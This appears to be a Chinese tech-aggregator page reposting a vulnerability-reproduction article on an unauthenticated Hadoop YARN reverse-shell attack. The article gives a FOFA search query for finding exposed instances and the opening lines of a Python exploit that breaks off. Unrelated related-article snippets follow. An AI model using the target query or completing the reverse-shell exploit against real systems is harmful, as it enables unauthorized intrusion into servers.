漏洞复现 || Hadoop未授权访问反弹Shell漏洞

news2024/12/23 23:45:58

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞描述

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害
在这里插入图片描述

资产确定

fofa:app="APACHE-hadoop-YARN"

漏洞复现

1.攻击机使用如下Exp进行反弹Shell

import requests
import sys
target = sys.argv

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/748361.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ppt转pdf怎么转换?推荐这几种转换方法

ppt转pdf怎么转换?PPT转PDF可以确保演示文稿的格式、布局和字体在不同设备上的一致性。PDF文件在不同操作系统和软件中都能以相同的方式呈现,避免了因PPT文件打开时出现格式错误或乱码。可能很多人还不知道如何进行转换,下面就给大家推荐几种…

gitee 使用

1.打开git bash 2.cd 进入到合适位置 3.git clone 项目 4.配置用户名和email(不然没法记录谁操作的)

unordered系列的底层结构——哈希表

目录 哈希概念 哈希冲突 哈希函数 解决哈希冲突的方法 闭散列 线性探测 线性探测的实现 ​编辑 二次探测 开散列 开散列概念 开散列的实现 开散列增容 开散列的思考 哈希概念 顺序结构以及平衡树中,元素关键码与其存储位置之间没有对应的关系&#xf…

https证书已经部署到宝塔,但访问网站还显示不生效问题解决

先说解决方法:重启Nginx服务器即可,可以在宝塔面板右上角直接重启即可解决。 过程 腾讯云的https免费证书只有一年有效期,而且续期不能在原证书上续,只能替换。但是我替换后,访问网站异常。如下图: 可以看…

TypeScript 中的【声明合并】规则

概念: 在TS中,如果定义了多个相同命名的函数,接口或者class 类,那么它们会自动合并成一个类型 函数的合并: 前面章节讲解的函数重载就是使用了定义多个函数的类型进行合并: function reverse(x: number):…

UE4 关于使用Webbrowser插件遇到的问题以及解决办法

1.无法播放网页视频,这是因为UE4的WebBrowser自带的cef3为3071版本,默认不支持h264等直播流,导致web里的直播流无法播放 解决办法:第一种办法,重新编译了cef源码,改成支持H.264,然后在UE4安装目…

2023AU软件,Adobe Audition 全系列软件下载安装教程

Audition 是一款强大的音频编辑软件,能够帮助用户实现各种音频剪辑和混音操作。下面是关于Audition 2023软件的安装教程,供大家参考。 步骤一:下载Audition 通过全系列网站下载或者百度网盘下载都行 步骤二:运行安装程序 下载…

node版本安装包大全

node所有的版本: https://nodejs.org/dist/

利用ChatGPT场景化学习英语听说读写

大家好,我是可夫小子,关注AIGC、读书和自媒体。解锁更多ChatGPT、AI绘画玩法。加我,备注:chatgpt,拉你进群。 我们从初中就开始学习英语,到大学也有小十年,在这个过程中,我们投入了很…

Java OkHttp3 异常:gzip finished without exhausting source 解决办法

今天在开发中遇见一个问题,同样一个请求,okhttp调用时候,报错gzip finished without exhausting source,浏览器和postman确是正常返回结果 String getsync OkHttpUtils.builder().url(wfsSearchUrl)// .addHeader("Accept-E…

【线程池管理工具-Hippo4j】

🚀 线程池管理工具-Hippo4j 🚀 🌲 AI工具、AI绘图、AI专栏 🍀 🌲 如果你想学到最前沿、最火爆的技术,赶快加入吧✨ 🌲 作者简介:硕风和炜,CSDN-Java领域优质创作者&#…

【 -bash: /usr/bin/id: 参数列表过长】

这个错误提示说明在执行 /etc/profile 或者 /etc/profile.d 目录下的脚本时,出现了参数列表过长的问题。这可能是由于环境变量或者执行的命令导致的。 要解决这个问题,可以尝试以下方法: 检查脚本内容:检查 /etc/profile 和 /et…

java后端接口API性能优化技巧

微信公众号访问链接:java后端接口API性能优化技巧 推荐文章: 1、springBoot对接kafka,批量、并发、异步获取消息,并动态、批量插入库表; 2、SpringBoot用线程池ThreadPoolTaskExecutor异步处理百万级数据; 3、SpringBoot用线程池ThreadPoolExecutor处理…

如何利用PLC远程通讯模块搭建PLC远程控制系统

随着工业自动化的快速发展,PLC(可编程逻辑控制器)作为重要的控制设备,被广泛应用于工厂和生产线的自动化控制系统。然而,传统的PLC控制系统受限于物理连接和局域网范围内的限制,无法实现远程监控和控制&…

RabbitMQ 常用 API

RabbitMQ 常用 API Connection 和 Channel 的创建、关闭 创建 Connection ConnectionFactory factory new ConnectionFactory(); // 方式1:通过设置参数创建 factory.setHost(IP_ADDRESS); factory.setPort(PORT); factory.setUsername("guest"); facto…

STM32 Proteus仿真可设置时间红绿灯-0075

STM32 Proteus仿真可设置时间红绿灯-0075 Proteus仿真小实验: STM32 Proteus仿真可设置时间红绿灯-0075 功能: 硬件组成:STM32F103C6单片机 74HC595串入并出芯片4个2位数码管显示十字路口红绿灯时间多个按键 1.包含机动车指示灯(红、黄、…

python实现前后端学生管理系统(前后端分离)

⭐作者介绍:大二本科网络工程专业在读,持续学习Java,努力输出优质文章 ⭐作者主页:逐梦苍穹 ⭐所属专栏:项目。 目录 1、前言2、思路总览首页注册登录管理员 3、详细代码3.1、项目目录3.2、static3.3、templates3.3.1、…

STM32 Proteus仿真全自动洗衣机洗涤脱水-0074

STM32 Proteus仿真全自动洗衣机洗涤脱水-0074 Proteus仿真小实验: STM32 Proteus仿真全自动洗衣机洗涤脱水-0074 功能: 硬件组成:STM32F103R6单片机LCD1602显示器 L298N驱动电机正反转蜂鸣器LED指示灯多个按键(标准洗,快速洗&a…

从一个bug开始,理解Fragment和ViewPager2的状态恢复流程

作者:西片 在使用Fragment和ViewPager2时遇到了一个奇怪的bug,于是顺藤摸瓜学习了一下Fragment和View的状态保存恢复流程,解决方法在最后面 首先看一下崩溃调用栈 java.lang.IllegalStateException: Expected the adapter to be fresh while…

RWKV系列2-ChatRWKV

注意使用最新的版本 提示词 ##### 步骤4.1英文对话指令say something --> chat with bot. use \\n for new line. --> alternate chat replyreset --> reset chatgen YOUR PROMPT --> free single-round generation with any prompt. use \\n for new line.i YOUR…